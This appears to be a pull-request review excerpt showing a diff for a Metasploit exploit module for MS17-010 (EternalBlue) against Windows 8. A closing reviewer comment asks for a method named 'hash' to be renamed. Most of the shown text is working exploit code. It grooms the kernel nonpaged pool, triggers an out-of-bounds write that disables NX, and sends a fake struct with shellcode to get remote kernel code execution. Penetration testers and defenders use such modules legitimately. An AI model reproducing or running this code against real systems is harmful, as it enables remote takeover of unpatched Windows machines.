modules/exploits/windows/smb/ms17_010_eternalblue_win8.rb

```diff
@@ -0,0 +1,945 @@
+      nx_conn.disconnect!
+      return
+    end
+
+    # create some big buffer at servereternal
+    # this buffer MUST NOT be big enough for overflown buffer
+    alloc_conn, alloc_sock = create_session_alloc_non_paged(NTFEA_SIZE - 0x2010, username, password, pid)
+    if alloc_conn.nil?
+      return
+    end
+
+    # groom nonpaged pool
+    # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
+    srvnet_conn = []
+    num_groom_conn.times { srvnet_conn.append(create_connection_with_big_smb_first_80(for_nx: true)) }
+
+    # create buffer size NTFEA_SIZE at server
+    # this buffer will be replaced by overflown buffer
+    hole_conn, hole_sock = create_session_alloc_non_paged(NTFEA_SIZE - 0x10, username, password, pid)
+    if hole_conn.nil?
+      return
+    end
+
+    # disconnect allocConn to free buffer
+    # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
+    alloc_sock.close
+
+    # hope one of srvnet_conn is next to holeConn
+    5.times { srvnet_conn.append(create_connection_with_big_smb_first_80(for_nx: true)) }
+
+    # remove holeConn to create hole for fea buffer
+    hole_sock.close
+
+    # send last fragment to create buffer in hole and OOB write one of srvnet_conn struct header
+    # first trigger, overwrite srvnet buffer struct for disabling NX
+    send_trans2_second(nx_conn, nx_tree.id, pid, fea_list_nx[nx_progress, fea_list_nx.length], nx_progress)
+
+    recv_pkt = RubySMB::SMB1::Packet::Trans2::Response.read(nx_conn.recv_packet)
+    if recv_pkt.status_code.value == 0xc000000d
+      print_good('good response status for nx: INVALID_PARAMETER')
+    else
+      print_error("bad response status for nx: #{recv_pkt.status_code.value}")
+    end
+
+    # one of srvnet_conn struct header should be modified
+    # send '\x00' to disable nx
+    srvnet_conn.each { |sk| sk.send("\x00", 0) }
+
+    # send last fragment to create buffer in hole and OOB write one of srvnet_conn struct header
+    # second trigger, place fake struct and shellcode
+    send_trans2_second(conn, tree.id, pid, fea_list[progress, fea_list.length], progress)
+    recv_pkt = RubySMB::SMB1::Packet::Trans2::Response.read(conn.recv_packet)
+    if recv_pkt.status_code.value == 0xc000000d
+      print_good('good response status for nx: INVALID_PARAMETER')
+    else
+      print_error("bad response status for nx: #{recv_pkt.status_code.value}")
+    end
+
+    # one of srvnet_conn struct header should be modified
+    # a corrupted buffer will write recv data in designed memory address
+    srvnet_conn.each { |sk| sk.send(fake_recv_struct + shellcode, 0) }
+
+    # execute shellcode, at this point the shellcode should be located at ffffffff`ffd04180
+    srvnet_conn.each(&:close)
+
+    nx_tree.disconnect!
+    nx_conn.disconnect!
+    nx_sock.close
+
+    tree.disconnect!
+    conn.disconnect!
+    sock.close
+  end
+
+  def hash(process)
```

Comment:
`#hash` is a special method in Ruby used to build hash tables, for safety, this will need a different name.
```suggestion
  def generate_process_hash(process)
```